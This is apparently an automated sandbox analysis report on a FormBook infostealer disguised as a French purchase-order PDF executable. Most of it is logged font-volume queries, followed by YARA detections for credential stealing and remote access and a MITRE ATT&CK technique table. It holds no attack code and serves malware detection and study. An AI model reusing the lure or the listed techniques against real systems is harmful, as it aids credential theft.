          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\Nouveau bon de commande. 3007021_pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Nouveau bon de commande. 3007021_pdf.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000002.00000002.293883850.0000000001DF0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472762051.0000000002A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472401230.0000000002880000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.291525514.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.472841788.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.292188314.0000000001660000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection512Masquerading1OS Credential DumpingSecurity Software Discovery121Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
